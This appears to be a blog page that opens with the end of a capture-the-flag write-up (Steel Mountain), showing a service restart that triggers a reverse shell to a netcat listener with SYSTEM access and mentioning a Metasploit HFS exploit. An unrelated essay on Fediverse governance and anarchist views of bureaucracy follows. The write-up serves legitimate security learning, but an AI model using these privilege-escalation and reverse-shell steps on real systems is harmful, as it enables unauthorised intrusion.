sc start AdvancedSystemCareService9

In our listener:

connect to [$tunip] from (UNKNOWN) [$target] 49431
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>

Conclusion

Phew! This was not not easy for me. I had to lean quite a bit on Zach Heller's writeup of this room for some tasks.

My lack of Windows know-how and particular Powershell skills crippled me in this challenge. Need more experience.

I realized early on that it would take me a long time to solve this on my own so I took the liberty of doing some googling and decided to make this a learning experience instead of a challenge.

It felt a bit like copy-paste "hacking" but it feels like I acquired new skills and experience along the way. I think a similar challenge would be a lot easier for me now.

The exploits were easy enough to understand and while I cheated I feel that I understand everything reasonably well in hindsight. I try my best to not just copy commands and get the flags but instead understand what I'm doing and why.

These themed challenges... While it's fun and flashy, hacking is in essence dry and "boring" so these themes at times feels a little forced. Sometimes it works well but when the theme consists of some usernames and a front page on a web server, I don't know...

Metasploit

One good thing is that I' m getting more and more comfortable using Metasploit!

Speaking of which, Metasploit is not supported in Pygments and I'm not completely happy with the current output using console but it will have to be good enough for now.

One major annoyance is that I couldn't get the windows/meterpreter/reverse_tcp payload working while using the windows/http/rejetto_hfs_exec exploit so I had to start a netcat listener outside of Metasploit and then it worked just fine. It would have been nice to solve the first part of this challenge completely inside Metasploit and the most annoying part is that I have no idea why this didn't work.

Offensive Pentesting path

Since I decided to write a blog post on every room in the Offensive Pentesting path I had to re-do the challenges up to and including Steel Mountain.

While re-doing challenges probably is very beneficial for your learning it's not that much fun. But now I'm at last up to speed so on to some new challenges!

More to come.

Tools used

assorted links [4]

Anarchy in the Fediverse: when bureaucrats creeps in

I stumbled upon the following discussion What would a fediverse “governance” body look like?

#Bluesky thinking of a “governance” body of the fediverse - If it does not have elephants running around throwing paper planes its likely the wrong structure

I find this sad but fascinating.

If you find yourself in a space without rulers it's just a matter of time before, more or less well meaning, bureaucrats start creeping in. "We" are suddenly in need of a "structure", "system" or "governance" as a goal necessary in itself, not to solve a particular problem. I'm guessing the reasoning goes something along the lines of that it's a good thing to have this structure in place for when problems arise.

It's of course important to keep in mind the possibility of ending up with The Tyranny of Structurelessness if you don't consider the question of how you make decisions but every situation is unique and when the "we" is so vague in this case it doesn't make much sense to even consider forming a governing body.

ActivityPub is an open, decentralized social networking protocol and The Fediverse currently consists of ~6000 servers taking to each other. These servers are governed in all sort of ways, coops, one-person shows, orgs, groups of friends, benign dictatorships, you name it. The Fediverse itself could perhaps somewhat accurately be described as an example of anarchy in action. Entities voluntarily interacting without any hierarchy. The development of the software, e.g. the flagship Mastodon, might be another story, I haven't looked into it but only the actual network is of interest here. I don't see the point of imposing a governing body on ourselves, that in the best case will be ineffective and useless.

When highly questionable mastodon instances started popping up, people spontaneously started sharing block lists to cut these instances off from the rest of the network. No governance body dusted off the people's stick and told the admins to do so. Given the opportunity, people are generally pretty OK at solving problems together.

Among anarchists the creeping bureaucrats is a well known phenomena and it almost seems like an inevitable fact of activism and political organizing in general that any social movement will be ruined by these people.

When you have an interesting project with liberatory potential or just practical value, you can be sure as hell that the bureaucrats will show up and practice their entryism and in the process most likely suck out all of the energy and momentum of the project.

You can't win against these people because they are excellent at hogging up space and time with endless discussions where any attempt at keeping them at bay will slowly but surely completely drain you of all of your energy. They are often well-spoken and seem to lack any hobbies and interests besides from activism. Because of this they tend to end up in these "democratically" elected positions since other people enthusiastic for whatever project probably didn't join up for the organizational politics. If you ever attended a political meeting you probably can relate to this.

Unfortunately, there are plenty of anarcho-bureaucrats as well. While anarchism can be an effective cure to this problem anarchists are just people.

There is some truth in that Anarchism in Practice Is Often Radically Boring Democracy but it doesn't have to be like that. Some times it makes sense to have long meetings on how to do things but often it's enough to just do things together in a non-hierarchical way with somewhat like-minded people. This makes anarchy something fun and spontaneous.

I've been in this game enough to come to the conclusion that the only way to win is not to play their game. Get out, take the good people and split off to form a new group. Another option is to forcefully resist the bureaucrats and push them out or limit their opportunities to impose their agenda while making it clear that this is behavior is unacceptable. This is challenging in practice since you want to be inviting and make people feel welcome. Non-anarchists might also welcome the bureaucrats with open arms making you the bad guy.

I have nothing against rigid organizations per se, sometimes a very formal organization is the least worst option to go forward but I don't think it's a good idea to have it as a default.

I would like to end this post with some recommendations for further reading on this subject. CrimethInc's From Democracy to Freedom: The Difference Between Government and Self-Determination and Anarchist Critique of Radical Democracy: The Impossible Argument by Markus Lundström. Cathy Levine's The Tyranny of Tyranny is also worth reading.

Let the bureaucrats rot away in their meetings.

pic